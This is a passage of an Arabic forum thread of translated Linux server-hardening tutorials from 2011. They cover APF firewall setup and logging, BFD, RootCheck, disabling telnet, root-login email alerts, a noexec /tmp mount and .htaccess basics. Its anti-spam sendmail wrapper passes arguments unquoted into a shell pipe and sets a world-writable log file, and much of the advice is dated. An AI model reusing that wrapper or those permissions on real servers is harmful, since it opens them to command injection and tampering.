    http://www.ossec.net/

    والله ولي التوفيق
    التعديل الأخير تم بواسطة HVIPS4 ; 06-19-2011 الساعة 10:43 AM

  4. #4
    أدارى
    الصورة الرمزية HVIPS4


    تاريخ التسجيل: Jun 2011
    رقم العضوية: 6
    الدولة: Cairo
    المشاركات: 1,979
    HVIPS4 غير متواجد حالياً

    رد: شرح حماية المنتدى والسيرفر مقدمة من Hvips.net


    الفكرة الثانية
    ----------------
    ================================================== ===============
    Changing APF log for TDP/UDP drops
    ================================================== ===============
    إذ كنت مضجرا من رؤية ملف
    /var/log/messages
    ممتلئا من الرسائل المرسلة من قبل الـجدار الناري apf فيوجد حل بإنشاء ملف لوغ منفصل من أجل TCP/UDP OUTPUT and drops
    وهذا سيحعل ملف لوغ الرسائل غير ممتلئ كثيرا وسهل التصفح

    المتلطلبات:
    -----
    اصدار جادر ناري
    APF Firewall 0.9.3 او أعلى كما انه يمكن أن يعمل على إصدار أدنى لكن ذلك لم يجرب لمعرفة إذا كان يعمل أم لا


    تغيير إعدادات الـ APF Firewall
    ------------------------
    1- قم بالدخول إلى السيرفر كرووت

    2- انشئ ملف لوغ جديد فقط من أجل the TCP/UDP output/drops from APF

    كود PHP:
    touch /var/log/iptables 

    3- قم بتغيير السماحيات من أجل تقييد النفاذ:

    كود PHP:
    chmod 600 /var/log/iptables 

    4- يجب علينا القيام بعمل باك لملف الـ syslog من أجل الأمان في حال قمنا باي خطأ عبر التلعليمة:


    كود PHP:
    cp /etc/syslog.conf /etc/syslog.conf.bak 

    5- تغيير الـ syslog ليجبر الـ iptables ليستخدم ملف اللوغ الجديد:

    كود PHP:
    pico /etc/syslog.conf 

    6- أضف ما يلي في نهاية الملف:


    كود PHP:
    # Send iptables LOGDROPs to /var/log/iptables  
    kern.=debug /var/log/iptables 

    - احفظ التغييرات
    ctrl + X then Y
    8- اعد تشغيل خدمة syslogd لتنفيذ التعديلات الجديدة :

    كود PHP:
    /sbin/service syslog reload 
    9- عمل نسخة احتياطية للـ أ.ب.اف:
    كود PHP:
         
                                cp 
    /etc/apf/firewall /etc/apf/firewall.bak 


    10- فتح الـ أ.ب.ف وعمل تعديلات عليه:

    كود PHP:
    pico /etc/apf/firewall 

    11- قم بالبحث عن DROP_LOG
    ستجد المقطع التالي

    كود PHP:
    if [ "$DROP_LOG== "1" ]; then 
    # Default TCP/UDP INPUT log chain 
            
    $IPT -A INPUT -p tcp -m limit --limit $LRATE/minute -i $IF -j LOG --log-prefix "** IN_TCP DROP ** " 
            
    $IPT -A INPUT -p udp -m limit --limit $LRATE/minute -i $IF -j LOG --log-prefix "** IN_UDP DROP ** " 
    قم بتبديله بالتالي:
    كود PHP:
                                if [ "$DROP_LOG== "1" ]; then 
    # Default TCP/UDP INPUT log chain 
            
    $IPT -A INPUT -p tcp -m limit --limit $LRATE/minute -i $IF -j LOG --log-level debug 
            $IPT 
    -A INPUT -p udp -m limit --limit $LRATE/minute -i $IF -j LOG --log-level debug 

    12- ابحث عن DROP_LOG أكثر من مرة حتى تجد المقطع التالي:

    كود PHP:
    if [ "$DROP_LOG== "1" ] && [ "$EGF== "1" ]; then 
    # Default TCP/UDP OUTPUT log chain 
            
    $IPT -A OUTPUT -p tcp -m limit --limit $LRATE/minute -o $IF -j LOG --log-prefix "** OUT_TCP DROP ** " 
            
    $IPT -A OUTPUT -p udp -m limit --limit $LRATE/minute -o $IF -j LOG --log-prefix "** OUT_UDP DROP ** " 
    قم بتبديله إلى

    كود PHP:
                                if [ "$DROP_LOG== "1" ] && [ "$EGF== "1" ]; then 
    # Default TCP/UDP OUTPUT log chain 
            
    $IPT -A OUTPUT -p tcp -m limit --limit $LRATE/minute -o $IF -j LOG --log-level debug 
            $IPT 
    -A OUTPUT -p udp -m limit --limit $LRATE/minute -o $IF -j LOG --log-level debug 

    13- احفظ التغييرات على الجدار الناري:
    Ctrl + X then Y
    14- أعد تشغيل الـجدار الناري لتنفيذ التعليماتت الجديدة عبر الأمر:

    كود PHP:
    /etc/apf/apf –r 

    15- نفذ الأمر للتأكد من أن ملف اللوغ الجديد يستقبل الرسائل:
    كود PHP:
                                tail –f /var/log/iptables 


    ستجد أشياء مكتوبة كهذه:
    كود PHP:
                                Aug 27 15:48:31 fox kernelIN=eth0 OUTMAC=00:0d:61:37:76:84:00:d0:02:06:08:00:08:00 SRC=192.168.1.1 DST=192.168.1.1 LEN=34 TOS=0x00 PREC=0x00 TTL=118 ID=57369 PROTO=UDP SPT=4593 DPT=28000 LEN=14 

    كذلك يمكن فحص ملف اللوغ الأساسي بانه لا يتسقبل معلومات من الجدار الناري عبر الأمر
    كود PHP:
         
                                tail –f 
    /var/log/messages 


    لمزيد من المعلومات يمكن الإطلاع على الرابط
    http://www.rfxnetworks.com/apf.php

    الفكرة الثالثة:
    ----------------
    How to Disable Telnet

    ان التيلينت خلال عملية الولوج أو تسجيل الدخول ترسل اسم المستخدم وكلمة السر بشكل واضح وبدون تشفير لذلك يجب ان يتم تعطيلها على السيرفر واستبدالها بالSSh
    بعض مزودي خدمة الاستضافة لا يقومو بتعطيل هذه الخدمة بشكل افتراضي ويجب الانتباه إلى ذلك وتعطيلها كما ان التيلنيت تصغي إلى الرسائل الداخلة والخارجة عبر البورت رقم 23 وإليكم كيفية إلغاء تفعيل هذه الخدمة:
    1- قم بالدخول إلى السيرفر كرووت من خلال اس اس اتش
    2- قم بتنفيذ الأمر التالي:
    كود PHP:
                                pico /etc/xinetd.d/telnet 

    3- ابحث عن السطر
    disable = no
    وغيره إلى
    disable = yes
    4- قم بإعادة تشغيل خدمة inetd service عبر الأمر:

    كود PHP:
    /etc/rc.d/init.d/xinetd restart 

    5- قد تبقى هذه الخدمة فعالة بعد الذي فعلناه لذلك لضمان أنها ليست فعالة نفذ الامر:

    كود PHP:
    /sbin/chkconfig telnet off 
    6- اعمل سكان للسيرفر للتأكد من أن البورت 23 مغلق:

    كود PHP:
    nmap -sT -O localhost 

    7- نفذ الأمر التالي لكي تتأكد من انه لا يوجد اي عملية خاصة بالتيلينت فعالة وإذا وجدت اي واحدة دمرها ب kill:
    كود PHP:
                                ps -aux grep telnet 



    شكرا لك يا أخي Ali Hamad وان شاء الله سأستمر في طرح كل الأفكار الجديدة في هذا المجال
    وأليكم الفكرة الرابعة

    ================================================== =================
    How to install BFD (Brute Force Detection)
    ================================================== =================
    ماهو ال BDF أو Brute Force Detection؟
    هو سكريبت شيل يقوم بمراقبة من يدخل السيرفر ويراقب حالات الدخول الفاشلة إلى السيرفر ويقوم بتسجيلها في ملف لوغ , ولا توجد معلومات تفصيلية كثيرة عن

    الـbdf كل ماهنالك أن تركيبه واستعماله سهل جدا للغاية ومن المهم ان يكون على كل سيرفر كمستوى جديد لحماية السيرفرسنقوم الآن بشرح طريقة تركيبه هلى السيرفر
    المتطلبات:
    -----
    يجب ان تكون قد ركبت الجدار الناري APF حيث أن الBFD لا يمكنه العمل بدونه

    التركيب----
    1- أدخل إلى السيرفر عن طريق الـ ssh

    2-انشئ مجلد جديد أو أدخل إلى المكان الذي تخزن عليه الملفات المؤقتة ::

    كود PHP:
    cd /root/downloads 

    3- قم بجلب الملف إلى السيرفر عن طريق الأمر:
    كود PHP:
                                wget http://www.rfxnetworks.com/downloads/bfd-current.tar.gz 

    4- قم بفك ضغط الملفات عن طريق الأمر:
    كود PHP:
                                tar -xvzf bfd-current.tar.gz 

    5-نفذ الأمر:
    cd bfd-0.7

    6- قم بالتركيب والتنصيب عن طريق الامر:

    كود PHP:
    ./install.sh 
    سوف تتلقى رسالة مفادها أنه تم التثبيت:.: BFD installed

    كود PHP:
    Install path:    /usr/local/bfd 
    Config path
    :     /usr/local/bfd/conf.bfd 
    Executable path
    : /usr/local/sbin/bfd 

    تعديل إعدادات ال BFD:
    -----------
    1- افتح ملف الإعدادات عن طريق الامر:
    كود PHP:
    pico /usr/local/bfd/conf.bfd

    2- فعل إعطاء الإنذار في حال حدوث محاولة اختراق:
    ابحث عن ALERT_USR="0" وغيرها إلى ALERT_USR="1"

    3- ضع البريد الالكتروني الذي تريد تلقي الإنذار عليه:
    ابحث عن EMAIL_USR="root" وغيرها إلى EMAIL_USR="your@yourdomain.com"

    4- احفظ التغييرات Ctrl+X then Y

    5- يجب ان تضع الاي بي ادريس IP Address الخاص بك عندما تدخل إلى السيرفر حتى لا يعمل لك بلوك:
    كود PHP:
    pico -w /usr/local/bfd/ignore.hosts

    ثم اكتب عناون الاي بي الذي تدخل به مثال:192.168.1.1
    6- احفظ التغييرات Ctrl+X then Y
    الآن قم بتشغيل البرنامج عن طريق الأمر:
    كود PHP:
    /usr/local/sbin/bfd -s

    7- يمكنك أن تتحكم بطريقة عمل بعض البرامج على السيرفر عن طريق تفحص الدليل
    كود PHP:
    /usr/local/bfd

    انتهت الفكرة

    الفكرة الخامسة

    ================================================== ==================
    Stop PHP nobody Spammers
    ================================================== ==================
    لا تستطيع بي اتش بي و لا الأباتشي منذ إصداراتها الأولى مراقبة ومتابعة الاشخاص اللذين يرسلون البريد الالكتروني عبر PHP mail function و ذلك عبر مستخدم nobody user والاشخاص الحقودين والماكرين يستغلون هذه النقطة لإرسال رسائل السبام بواسطة سكريتات بي اتش بي أوغيرها دون ان تعرف من يقوم بذلك من هؤلاء الاشخاص
    إن مراقبة exim_mainlog لا يساعدك كثيرا في هذا الأمر لأنك سترى أن هناك من يرسل رسائل لكن لا تدري من هو المستخدم الذي يرسل هذه الرسائل و أين تقع السيكريبت التي ترسل هذه الرسائل
    أذا فحصت ملف PHP.ini ستجد أن برنامج البريد موضوع بشكل افتراضي على المسار
    /usr/sbin/sendmail
    ستجد ان اغلب سكريبتات الـphp تستخدم هذا المسار لإرسال الرسائل عبر التابع mail(); لذلك فإن اغلب الرسائل سترسل عبر
    /usr/sbin/sendmail =)

    المتطلبات
    -----
    سنفترض أنك تستخدم الإصدارات التالية:
    Apache 1.3x, PHP 4.3x and Exim
    الوقت اللازم:
    ------
    عشر دقائق تقريبا

    طريقة التنفيذ:-------
    1- الدخول إلى السيرفر عبر SSh
    2- قم بايقاف Exim لمنع اي تأثيرات جانبية:
    كود PHP:
    /etc/init.d/exim stop

    3-قم بعمل نسخة احتياطية للملف الافتراضي /usr/sbin/sendmail عبر الأمر:
    كود PHP:
    mv /usr/sbin/sendmail /usr/sbin/sendmail.hidden

    4- قم بإنشاء سكريبت مراقبة للإيميلات الجديدة المرسلة:
    كود PHP:
    pico /usr/sbin/sendmail

    انسخ ما يلي:
    كود PHP:

    #!/usr/local/bin/perl

    # use strict;
    use Env;
    my $date = `date`;
    chomp $date;
    open (INFO, ">>/var/log/spam_log") || die "Failed to open file ::$!";
    my $uid = $>;
    my @info = getpwuid($uid);
    if(
    $REMOTE_ADDR) {
    print
    INFO "$date - $REMOTE_ADDR ran $SCRIPT_NAME at $SERVER_NAME n";
    }
    else {

    print
    INFO "$date - $PWD - @infon";

    }
    my $mailprog = '/usr/sbin/sendmail.hidden';
    foreach (@
    ARGV) {
    $arg="$arg" . " $_";
    }

    open (MAIL,"|$mailprog $arg") || die "cannot open $mailprog: $!n";
    while (<
    STDIN> ) {
    print
    MAIL;
    }
    close (INFO);
    close (MAIL);

    والصقه


    5- قم بتغيير السماحيات عبر الأمر:
    كود PHP:
    chmod +x /usr/sbin/sendmail

    6- انشئ ملف لوغ جديد :
    كود PHP:
    touch /var/log/spam_log

    chmod 0777
    /var/log/spam_log

    7- أعد تشغيل exim
    كود PHP:
    /etc/init.d/exim start

    8- راقب ملف spam_log وجرب قبل ذلك ان ترسل أي رسالة مثلا من أي صفحة اتصل بنا :
    كود PHP:
    tail - f /var/log/spam_log

    لمنع جعل ملف اللوغ كبير يجب ضبط إعدادات Log Rotation Details
    وذلك عبر مايلي:
    1- افتح الملف logrotate.conf عبر الامر:
    كود PHP:
    pico /etc/logrotate.conf

    2- ابحث عن:
    كود PHP:
    # no packages own wtmp -- we'll rotate them here
    /var/log/wtmp {
    monthly
    create 0664 root utmp
    rotate 1
    }

    أضف بعدها:
    كود PHP:
    # SPAM LOG rotation
    /var/log/spam_log {
    monthly
    create 0777 root root
    rotate 1
    }

    انتهت الفكرة الخامسة
    التعديل الأخير تم بواسطة HVIPS4 ; 06-19-2011 الساعة 10:59 AM

  5. #5
    أدارى
    الصورة الرمزية HVIPS4


    تاريخ التسجيل: Jun 2011
    رقم العضوية: 6
    الدولة: Cairo
    المشاركات: 1,979
    HVIPS4 غير متواجد حالياً

    رد: شرح حماية المنتدى والسيرفر مقدمة من Hvips.net


    شكرا للجميع على ردودهم واتمنى أن أوفق في اكمال ما بدات به حتى النهاية
    واليكم الفكرة السادسة:

    ================================================== ====================
    E-mail Alert on Root SSH Login================================================== ====================
    بهذه الفكرة التي نتكلم عنها اليوم ستتمكن من استقبال رسالة بريدية مجرد دخول أي شخص إلى السيرفر كرووت وهذا أمر هام من أجل تتبع كل من يدخل إلى السيفر كرووت حيث سترسل رسالة فورية لك تخبرك بذلك ويفضل أن تضع عنوان بريد الكتروني في سيرفر أو استضافة أخرى وليست على نفس سيرفرك الذي سيرسل رسالة التحذير ويفضل استخدام هذه الطريقة في حال كان هناك أكثر من مدير للسيرفر واليكم الطريقة:
    1- إدخل إلى السيرفر كرووت عن طريق SSh
    2- نفذ الأمر :
    كود PHP:
    cd /root

    3- افتح الملف .bashrc للكتابة:
    كود PHP:
    pico .bashrc

    4- أضف ما يلي في نهاية الملف مع تغيير الايميل والهوست:
    كود PHP:
    echo 'ALERT - Root Shell Access (YourserverName) on:' `date` `who` |
    mail -s "Alert: Root Access from `who | cut -d"(" -f2 | cut -d")" -
    f1`"
    you@yourdomain.com


    5- أحفظ الملف Crtl + X then Y

    6- يمكنك الآن الخروج من الـ اس اس اتش والدخول مرة ثانية للتجريب
    وهذه نهاية الفكرة


    الفكرة السابعة:
    ================================================== ===================
    How to install APF (Advanced Policy Firewall)
    ================================================== ===================
    برنامج الجدار الناري من أقوى برامج الحامية يصلح لأن يكون راكبا على كل سيرفر يقوم بحماية أكيدة وفعالة للسيرفر وهو سهل الاعداد ولمزيد من الملعولمات يمكن الإطلاع على الرابط:
    http://www.rfxnetworks.com/apf.php

    طريقة التركيب:
    1- الدخول إلى السيرفر كرووت عن طريق SSh
    2- انشئ مجلدا لتحميل الملف المضغوط عليه و فك ضغط هذا الملف وليكن هذا المجلد اسمه downloads
    3- إدخل إلى هذا المجلد عن طريق الامر:
    كود PHP:
    cd /root/downloads

    4- قم بجلب ملف الجدار الناري غلى السيرفر عن طريق الأمر:
    كود PHP:
    wget http://www.rfxnetworks.com/downloads/apf-current.tar.gz

    5- فم بفك ضغط هذا الملف:
    كود PHP:
    tar -xvzf apf-current.tar.gz

    6- حسب الإصدار الأخير للبرنامج نفذ الأمر
    كود PHP:
    cd apf-0.9.5-1/

    7- شغل برنامج التنصيب:
    كود PHP:
    ./install.sh

  6. #6
    أدارى
    الصورة الرمزية HVIPS4


    تاريخ التسجيل: Jun 2011
    رقم العضوية: 6
    الدولة: Cairo
    المشاركات: 1,979
    HVIPS4 غير متواجد حالياً

    رد: شرح حماية المنتدى والسيرفر مقدمة من Hvips.net



    8- سوف تتلقى رسالة بانتهاء التنصيب:

    Installing APF 0.9.5-1: Completed.

    Installation Details:
    Install path: /etc/apf/
    Config path: /etc/apf/conf.apf
    Executable path: /usr/local/sbin/apf
    AntiDos install path: /etc/apf/ad/
    AntiDos config path: /etc/apf/ad/conf.antidos
    DShield Client Parser: /etc/apf/extras/dshield/

    Other Details:
    Listening TCP ports: 1,21,22,25,53,80,110,111,143,443,465,993,995,2082, 2083,2086,2087,2095,2096,3306
    Listening UDP ports: 53,55880
    Note: These ports are not auto-configured; they are simply presented for information purposes. You must manually configure all port options.

    9- سنقوم الآن بضبط إعدادات الجدار الناري فنفتح الملف التالي للتعديل:
    كود PHP:
    pico /etc/apf/conf.apf

    10- ابحث عن USE_DS="0"
    وغيرها إلى USE_DS="1"

    11- إعدادات بورتات الجدار الناري:
    من اجل cpanel
    من اجل بورتات الاستقبال inbound ports:
    أضف مايلي
    كود PHP:
    # Common ingress (inbound) TCP ports -3000_3500 = passive port range for Pure FTPD
    IG_TCP_CPORTS="21,22,25,53,80,110,143,443,2082,2083, 2086,2087, 2095, 2096,3000_3500"
    #
    # Common ingress (inbound) UDP ports
    IG_UDP_CPORTS="53"

    بورتات الإرسال Outbound ports
    كود PHP:
    # Egress filtering [0 = Disabled / 1 = Enabled]
    EGF="1"

    # Common egress (outbound) TCP ports
    EG_TCP_CPORTS="21,25,80,443,43,2089"
    #
    # Common egress (outbound) UDP ports
    EG_UDP_CPORTS="20,21,53"

    من اجل سيرفرات Ensim :أضف مايلي
    من اجل بورتات الاستقبال inbound ports:
    كود PHP:
    # Common ingress (inbound) TCP ports
    IG_TCP_CPORTS="21,22,25,53,80,110,143,443,19638"
    #
    # Common ingress (inbound) UDP ports
    IG_UDP_CPORTS="53"

    من اجل بورتات الإرسال Outbound ports:
    كود PHP:
    # Egress filtering [0 = Disabled / 1 = Enabled]
    EGF="1"

    # Common egress (outbound) TCP ports
    EG_TCP_CPORTS="21,25,80,443,43"
    #
    # Common egress (outbound) UDP ports
    EG_UDP_CPORTS="20,21,53"

    أحفظ الملف Crtl + X then Y

    12- شغل الجدار الناري عبر الأمر:
    كود PHP:
    /usr/local/sbin/apf -s

    هناك أوامر اخرى مثل:
    إعادة تشغيل الجدار الناري:

    كود PHP:
    -s|--start ......................... load firewall policies
    -r|--restart ....................... flush & load firewall إعادة التشغيل
    -f|--flush|--stop .................. flush firewall توقيف الجدار الناري
    -l|--list .......................... list chain rules إظهار القواعد التي يعمل عليها الجدار الناري
    -st|--status ....................... firewall status حالة الجدار الناري

    13-تعديل خيار الـ DEV
    بعد التأكد من ان الجدار الناري يعمل بشكل صحيح يجب إلغاء خيار ايقاف الجدار الناري كل خمس دقائق من الكرون جوب cron وذلك بفتح الملف :
    كود PHP:
    pico /etc/apf/conf.apf

    ابحث عن
    DEVM="1" وغيرها إلى DEVM="0"

    14- إعداد الجدار الناري من اجل AntiDOS :
    افتح الملف:
    كود PHP:
    pico /etc/apf/ad/conf.antidos

    إذهب إلى القسم # [E-Mail Alerts] و ضع الإعدادات التالية:
    ضع هنا اسم شركتك:

    كود PHP:
    # Organization name to display on outgoing alert emails
    CONAME="Your Company"

    من أجل أن يرسل لك رسالة عند حصول محاولة اختراق او دوس اتاك dos attack غير ما يلي إلى 1
    كود PHP:
    # Send out user defined attack alerts [0=off,1=on]
    USR_ALERT="0"

    ثم ضع بريدك هنا
    كود PHP:
    # User for alerts to be mailed to
    USR="your@email.com"

    أحفظ الملف Crtl + X then Y

    15- أعد تشغيل الجدار الناري:
    كود PHP:
    /usr/local/sbin/apf -r

    16- فحص ملف اللوغ للجدار الناري:
    كود PHP:
    tail -f /var/log/apf_log

    Example output:
    Aug 23 01:25:55 ocean apf(31448): (insert) deny all to/from 185.14.157.123
    Aug 23 01:39:43 ocean apf(32172): (insert) allow all to/from 185.14.157.123

    17- تشغيل جدار الناري عند كل إعادة تشغيل للسيرفر:
    كود PHP:
    chkconfig --level 2345 apf on

    لمنع الجدار الناري من العمل اتوماتيكيا عند تشغيل السيرفر:
    كود PHP:
    chkconfig --del apf

  7. #7
    أدارى
    الصورة الرمزية HVIPS4


    تاريخ التسجيل: Jun 2011
    رقم العضوية: 6
    الدولة: Cairo
    المشاركات: 1,979
    HVIPS4 غير متواجد حالياً

    رد: شرح حماية المنتدى والسيرفر مقدمة من Hvips.net


    - عمل بلوك لاي بي معين:
    هناك طريقتين:
    الطريقة الاولى

    كود PHP:
    /etc/apf/apf -d IPHERE COMMENTHERENOSPACES

    السويتش او اللاحقة d- تعني عمل بلوك لأي بي محدد
    IPHERE ضع بدلا عنها عنوان الاي بي الذي تريد حذفه
    COMMENTHERENOSPACES يمكنك الكتابة بدلا عنها سبب المنع لكن أكتب كلمات بدون فراغ بينها
    مثال:
    كود PHP:
    ./apf -d 185.14.157.123 TESTING

    افتح بعدها الملف:
    كود PHP:
    pico /etc/apf/deny_hosts.rules

    ستجد:
    # added 185.14.157.123 on 08/23/05 01:25:55
    # TESTING
    185.14.157.123

    الطريق الثانية لمنع اي بي:
    افتح الملف
    كود PHP:
    pico /etc/apf/deny_hosts.rules

    ضع في كل سطر اي بي واحد من الايبيات التي تريد عمل بلوك لها وعليك بعد حفظ الملف غعادة تشغيل الجدار الناري:
    كود PHP:
    /etc/apf/apf -r

    السماح لاي بي محجوب بإمكانية وإلغاء البلوك عليه:
    عن طريق التعليمة:
    كود PHP:
    /etc/apf/apf -a IPHERE COMMENTHERENOSPACES

    الخيار او اللاحقة a- تعني إلغاء الحجب عن اي بي معين
    IPHERE ضع بدلا عنها عنوان الاي بي الذي تريد إلغاء حجبه
    COMMENTHERENOSPACES يمكنك الكتابة بدلا عنها سبب إلغاء الحجب لكن أكتب كلمات بدون فراغ بينها

    مثال:
    ./apf -a 185.14.157.123 UNBLOCKING

    pico /etc/apf/allow_hosts.rules

    # added 185.14.157.123 on 08/23/05 01:39:43
    # UNBLOCKING
    185.14.157.123

    الفكرة الثامنة
    ================================================== ========================
    تغيير الرسالة الترحيبية عند دخول المستخدمين إلى السيرفر
    ================================================== ========================

    يمكن وضع رسالة ترحيبية تظهر عند دخول أي مستخدم إلى السيرفر عن طريق الـ SSh

    ويكون ذلك بتعديل ملف motd

    والطريقة:
    1- ادخل غلى السيرفر كرووت عن طريق الـ SSh
    2- افتح الملف التالي:
    كود PHP:
    pico /etc/motd

    3- اكتب الرسالة الترحيبية التي تريدها ان تظهر
    4-أحفظ الملف Crtl + X then Y
    انتهت الفكرة

    السلام عليكم ورحمة الله وبركاته
    أخواني الأكارم أٌقدم لكم هذه المجموعة من الدروس المنتقاة لحماية و زيادة أمن السيرفر وجعله مستقرا وقد قمت بجمع هذه الدروس من أشهر المواقع الأجنبية في مجال حماية السيرفر وذلك بعد تجريبها والتأكد من صحتها وخلوها من أي خطأ وأتمنى أن يلقى عملي هذا ترحيبا وتشجيعا من الجميع وأن يساعد كل من ليس لديه خبرة في إدارة وحماية السيرفر قد استفاد من هذه الدروس كما قمت باختيار هذا الموقع اقصد الويب العربي نظرا لتفوقه على جميع الماوقع العربية على الإطلاق في هذا المجال ولنبدأ بالدرس الأول:
    ================================================== ===================
    Root Check
    ================================================== ===================
    يقوم بفحص وعمل سكان للنظام لمعرفة ما إذا كان هناك أي تروجان ويقوم بفحص البورتات ومعرفة إذا كان هناك أي مخترق كما يقوم بفحص اللوغ و السماحيات والكثير...

    تعليمات التنصيب
    -------
    قم بالدخول إلى السيرفر كرووت
    نفذ التعليمات التالية:

    كود PHP:
    wget http://www.ossec.net/rootcheck/files/rootcheck-0.4.tar.gz

    tar -xvzf rootcheck-0.4.tar.gz
    cd rootcheck
    -0.4
    ./install

    ذلك تكون قد قمت بتنزيل الرووت تشيك على السيرفر وعندما ينتهي التنصيب ستستقبل الرسالة التالية:

    كود PHP:
    Compilation sucessfull. Ready to go.
    ---------------------------------------------------------
    Thats it! If everything went ok, you should be ready to run RootCheck. If you any doubts
    about installation
    , please refer to INSTALL file. You can also find additional information
    at
    : http://www.ossec.net/rootcheck/ Improves, patches, comments are very welcome.

    ---------------------------------------------------------


    فحص النظام
    -------
    الآن بعد ان قمت بالتنصيب يمكنك فحص النظام من خلال التعليمة التالية:
    كود PHP:
    ./rootcheck.pl

    ستنتقل بعدها إلى شاشة تفاعلية وستخزن جميع المعلومات في الملف
    results.txt
    حيث ستجد معلومات واضحة عن الملفات المشتبه بها وما قام به البرنامج أثناء الفحص
    إذا أردت معلومات أكثر عن الرووت تشيك يمكن أن تجدها في الموقع
    http://www.ossec.net/

    والله ولي التوفيق



    السلام عليكم ورحمة الله وبركاته

    في البداية أود شكر كل الأخوة على مرورهم الطيب واتمنى من الله أن أكون قد حققت جزءا ولو قليل من الفائدة لجميع أعضاء الويب العربي وكما أتقدم باشكر لإدارة الويب العربي وخاصة المشرف على هذا القسم الذي أتاح لنا مساحة على موقع الويب العربي لكتابة مثل هكذا أفكار ....

    لن اطيل عليكم وهذه الفكرة التاسعة
    -------------------------------------------------------------------------
    إصلاح قواعد البيانات والجداول الموجودة فيها:
    -------------------------------------------------------------------------

    بين الحين والآخر قد تتعطل قواعد البيانات نتيجة لانخفاض مساحة القرص أو نتيجة فشل في التغذية الكهربائية او نتيجة لأي خطأ آخر

    يمكن استخدام هذه الاوامر لإصلاح قواعد البيانات والجداول الموجودة فيها

    1- اصلاح MyISAM mySQL Tables/Databases

    كود PHP:
    cd /var/lib/mysql/DBNAME

    كود PHP:
    myisamchk *.MYI

    2- اصلاح mySQL Tables/Databases

    كود PHP:
    cd /var/lib/mysql/DBNAME

    كود PHP:
    isamchk *.MYI

  8. #8
    أدارى
    الصورة الرمزية HVIPS4


    تاريخ التسجيل: Jun 2011
    رقم العضوية: 6
    الدولة: Cairo
    المشاركات: 1,979
    HVIPS4 غير متواجد حالياً

    رد: شرح حماية المنتدى والسيرفر مقدمة من Hvips.net


    الفكرة العاشرة

    -----------------------------------------------------------------------------------
    Securing Your /tmp Partition with Cpanel/WHM
    -------------------------------------------------------------------------

    السلام عليكم
    لقد وجدت هذه الطريقة من اجل حماية tmp حيث بهذه الطريقة تجعل قسما أو بارتشن محمي وخاص بالـ tmp وذلك عن طريق عمل ماونت mount له باستخدام noexec- وإليكم الطريقة

    1- أدخل إلى السيرفر كرووت عن طريق الـSSh
    2-أدخل إلى مجلد dev على سيرفرك :

    كود PHP:
    cd /dev

    3- نقوم بانشاء مساحة 100 ميغا عن طريق انشاء ملف tmpMnt عبر التعليمة التالية:

    كود PHP:
    dd if=/dev/zero of=tmpMnt bs=1024 count=100000

    ويمكنك زيادة الحجم بالقدر الذي تريد

    4- انشاء نمط نظام الملفات للملف tmpMnt عبر التعليمة:

    كود PHP:
    /sbin/mke2fs /dev/tmpMnt

    5- نقوم بعمل باك اب لمجلد التيمب tmp الأساسي عبر تنفيذ السطر:
    كود PHP:
    cd /
    cp -R /tmp /tmp_backup

    6- عمل ماونت mount لقسم التيمب الجديد عبر noexec :

    كود PHP:
    mount -o loop,noexec,nosuid,rw /dev/tmpMnt /tmp

    7- نقوم بتغيير السماحيات:

    كود PHP:
    chmod 1777 /tmp

    8- نقوم الآن بنسخ كافة محتويات قسم التيمب القديم إلى الجديد:

    كود PHP:
    cp -R /tmp_backup/* /tmp/

    9 - نقوم بحذف مجلد التيمب القديم:

    كود PHP:
    rm -rf /tmp_backup

    10-نقوم بعمل ماونت أوتوما تيكي عند إعادة اقلاع السيرفر في كل مرة حيث نقوم بفتح الملف fstab عبر التعليمة:

    كود PHP:
    pico -w /etc/fstab

    وعندما تقوم بفتح هذا الملف ستجد مكتوبا فيه شيئأ كهذا:

    كود PHP:
    /dev/hda3 / ext3 defaults,usrquota 1 1
    /dev/hda1 /boot ext3 defaults 1 2
    none
    /dev/pts devpts gid=5,mode=620 0 0
    none
    /proc proc defaults 0 0
    none
    /dev/shm tmpfs defaults 0 0
    /dev/hda2 swap swap defaults 0 0

    في نهاية هذا الملف أضف الكود التالي:

    كود PHP:
    /dev/tmpMnt /tmp ext2 loop,noexec,nosuid,rw 0 0

    حيث أن كل فراغ موجود في السطر السابق نقوم بتوليده عن طريق زر Tap في لوحة المفاتيح

    11- قم بحفظ الملف:

    كود PHP:
    Ctrl + X and Y

    وهذا كل شيئ

    والله ولي التوفيق

    تمت ترجمة هذه الفكرة من الموقع الأجنبي:
    http://www.webhostgear.com/34.html
    -------------------------------------------------


    الفكرة الحادية عشر
    --------------------------------------------------------
    كيف استفيد من ملف .htaccess
    ------------------------------------------------------

    مقدمة
    سنتعرف في هذا الموضوع على ما يمكننا الوصول و كيف يمكن تطوير موقعنا بواسطة ملف htaccess . و بالرغم من كونه ملف صغير فعدة أسطر فيه يمكن أن تطور موقعك بشكل كبير.

    هل يدعمه مستضيف موقعي؟
    لا يمكن الإجابة على هذا السؤال . لكن يمكنك تجربة إنشاء ملف و إرساله إلى مستضيفك و تأكد إن كان يعمل أولا أو أسأل مستضيف موقعك .

    إنشاء الملف
    افتح محرر النصوص المفضل لديك مثلا برنامج notepad المرفق مع الويندوز (programs>accessories>notepad) و احفظ الملف باسم

    كود PHP:
    .htaccess

    ليس هناك اسم للملف فقط امتداد مكون من 8 أحرف ولذلك قد لا تقبل بعض الأنظمة حفظ الملف لذلك يمكنك عند الحفظ وضع علامتي تنصيص حول الملف

    كود PHP:
    ".htaccess"

    ملاحظة أخيرة
    هذا الملف لا يمكن أن يضرك كل ما هناك قد تكون صفحات خطأ 500 و بمجرد حذف الملف يعود موقعك إلى ما كان عليه لكن لو كنت تستعمل امتدادات فرونت بيج Microsoft FrontPage Extensions فهو بالفعل يستخدم هذا الملف . كما قد يكون مستضيف موقعك يستخدمه و عدلت انت عليه من خلال cpanel مثلا .. لو وجد هذا الملف في سيرفرك قم بتحميله إلى جهازك و التعديل عليه و إعادة تحميله .

    لو جربت الطريقة السابقة و لم تعمل.. أعط أي اسم للملف و ارفعه لمستضيفك و بعد ذلك غير اسمه .

    أولا : صفحات خطأ خاصة بموقعك
    انشأ صفحات الخطأ التي تريد مثلا صفحة الخطأ رقم 404 و الذي يعني ان الصفحة غير موجودة سننشأ ملف و نسميه 404error.htm و هكذا و نكتب الكود التالي في الملف


    ErrorDocument 403 http://yoursite/403error.htm

    ErrorDocument 404 http://yoursite/404error.htm

    نحمل الملف مع الصفحات التي انشأناها إلى السيرفر . و انتهينا ..نقره لتكبير أو تصغير الصورة ونقرتين لعرض الصورة في صفحة مستقلة بحجمها الطبيعي هناك عدد كبير من الاخطاء يمكنك التعرف عليها هنا :

    400, bad request المستضيف غير مهيئ أو قادر على الوصول لهذا العنوان .
